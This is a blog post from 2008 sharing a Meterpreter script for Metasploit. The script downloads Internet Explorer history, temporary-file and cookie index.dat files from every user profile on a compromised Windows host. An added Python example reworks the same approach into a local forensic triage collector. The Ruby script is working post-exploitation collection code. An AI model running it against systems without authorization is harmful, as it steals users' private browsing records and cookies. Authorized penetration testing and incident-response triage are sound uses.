Meterpreter Script: Pull IE Browser History
by Raj on Nov. 24, 2008, under Metasploit
A friend, Joseph Puran (blog here), and I worked on a simple Meterpreter script for the Metasploit Framework. The script quickly pulls the index.dat files that IE uses to store history, Temporary Internet Files, and cookie information. It is still a work in progress: a later revision will parse the index.dat files and return only the needed information, and the same approach can be generalized to pull any file from each user's profile directory on a Windows box.
#Rajendra Umadas
#Joseph Puran
#version 0.95

require 'fileutils'

#This function takes in the path that holds the Windows user folders.
#It then enumerates all of those folders and pulls the IE history, cookies,
#and Temporary Internet Files index.dat files.
#It may seem pointless to make this a function now, but future revisions are planned that will
#generalize its use.
def pullRawData(path)
  #All the pulled data will be stored in msfRoot/IE_Browser_History/[Timestamp]/
  t = Time.now
  folderPath = 'IE_Browser_History' + ::File::Separator + t.strftime("%Y_%m_%d_%H_%M_%S")
  ::FileUtils.mkdir_p(folderPath)

  #For each item in the folder that contains user information
  client.fs.dir.foreach(path) { |user|
    #CHECK it is not . or .. ELSE look at next item
    next if user =~ /^(\.|\.\.)$/
    #CHECK that it is a directory ELSE look at next item
    next if not client.fs.file.stat(path + user).directory?

    #The three blocks below are wrapped in begin/rescue/end blocks so we can
    #recover from an exception. This is needed because if we ever try to access a file
    #or directory that does not exist, an exception is raised. If we do not catch
    #this exception our entire script will die. This may leave information on the
    #machine that we could have gathered. This exception handling also covers files
    #or directories that we do not have permission to access.

    #This block pulls the History index.dat file
    begin
      history = path + user + "\\Local Settings\\History\\History.IE5\\index.dat"
      pathPrefix = folderPath + ::File::Separator + user
      client.fs.file.download_file(pathPrefix + "_history.dat", history)
      print_line("Extracted IE History from: " + user)
    rescue
    end

    #This block pulls the Temporary Internet Files index.dat file
    begin
      tempFile = path + user + "\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat"
      pathPrefix = folderPath + ::File::Separator + user
      client.fs.file.download_file(pathPrefix + "_temp.dat", tempFile)
      print_line("Extracted IE Temp Info from: " + user)
    rescue
    end

    #This block pulls the Cookies index.dat file
    begin
      cookies = path + user + "\\Cookies\\index.dat"
      pathPrefix = folderPath + ::File::Separator + user
      client.fs.file.download_file(pathPrefix + "_cookies.dat", cookies)
      print_line("Extracted IE cookie info from: " + user)
    rescue
    end
  }
end

#Other operating systems will be supported by passing in other base directories.
baseDir = "c:\\documents and settings\\"
pullRawData(baseDir)
#A parsing function will be added to pull the important information out of the binary data pulled.
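The per-artifact begin/rescue pattern the script's comments spend most of their space on (one missing or unreadable file must not abort the whole collection) is the same pattern an incident responder uses when triaging profile artifacts from a mounted disk image or a host they own. Below is an added Python example, not the blog's script, that runs locally against a constructed directory tree instead of over a Meterpreter session. It isolates failures per artifact, records the outcome of every attempt so gaps in the collection are visible, and hashes each copy for a custody record. The names collect, demo, ARTIFACTS and sha256_hex, and the sample users "alice" and "bob", are assumptions of this example.

```python
"""Per-profile artifact triage collector (added example, not the blog's script)."""
import hashlib
import shutil
import tempfile
import time
from pathlib import Path

# Relative paths of the artifacts the blog's script collects (IE5-era profile layout).
ARTIFACTS = {
    "history": Path("Local Settings") / "History" / "History.IE5" / "index.dat",
    "temp":    Path("Local Settings") / "Temporary Internet Files" / "Content.IE5" / "index.dat",
    "cookies": Path("Cookies") / "index.dat",
}


def sha256_hex(data: bytes) -> str:
    """Hash helper so copies can be verified later against the triage manifest."""
    return hashlib.sha256(data).hexdigest()


def collect(base_dir, out_root, artifacts=ARTIFACTS):
    """Copy each artifact of each profile directory under base_dir into a timestamped folder.

    Returns {"<user>/<label>": {"status": ..., "sha256": ...}} so the caller sees exactly
    what was and was not recovered; a failure on one artifact never stops the others.
    """
    base = Path(base_dir)
    out_dir = Path(out_root) / time.strftime("%Y_%m_%d_%H_%M_%S")
    out_dir.mkdir(parents=True, exist_ok=True)
    results = {}
    for entry in sorted(base.iterdir()):          # iterdir never yields "." or ".."
        if not entry.is_dir():                    # stray files at profile level are not profiles
            continue
        for label, rel in artifacts.items():
            src = entry / rel
            dst = out_dir / f"{entry.name}_{label}.dat"
            key = f"{entry.name}/{label}"
            try:
                shutil.copy2(src, dst)
                results[key] = {"status": "ok", "sha256": sha256_hex(dst.read_bytes())}
            except FileNotFoundError:
                results[key] = {"status": "missing", "sha256": None}
            except OSError as exc:                # permission denied, locked file, I/O error
                results[key] = {"status": f"error:{exc.__class__.__name__}", "sha256": None}
    return results


def demo():
    """Build a constructed profile tree in a temp dir and run collect() against it."""
    root = Path(tempfile.mkdtemp(prefix="triage_demo_"))
    base = root / "Documents and Settings"
    base.mkdir(parents=True, exist_ok=True)
    # Constructed sample data: alice has every artifact, bob only has cookies.
    present = {"alice": ("history", "temp", "cookies"), "bob": ("cookies",)}
    for user, labels in present.items():
        (base / user).mkdir(exist_ok=True)
        for label in labels:
            p = base / user / ARTIFACTS[label]
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_bytes(f"{user}-{label}".encode())
    # A plain file at profile level; it must be skipped, not treated as a user.
    (base / "desktop.ini").write_text("[.ShellClassInfo]\n")
    try:
        return collect(base, root / "out")
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for key, info in demo().items():
        print(f"{key:16} {info['status']:8} {info['sha256'] or ''}")
```

The status map is the point of the design: the original script prints only successes, so a profile whose files were locked or absent leaves no trace in the output. Returning "missing" and "error:<type>" per artifact lets a responder distinguish "never existed" from "could not read", which matters when deciding whether to re-collect from a different acquisition method.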
November 24th, 2008 on 6:54 pm
Hi All,
As Raj has stated, above is a Meterpreter script for the Metasploit Framework which the two of us worked on for a pen-testing assignment. It currently undergoes simple extraction of IE browser temp files from remote machines. Future revisions of the Meterpreter script would involve a summary of the files extracted in a human readable format. Well, thanks for viewing Raj's blog and don't forget to view mine, as I will have one available shortly.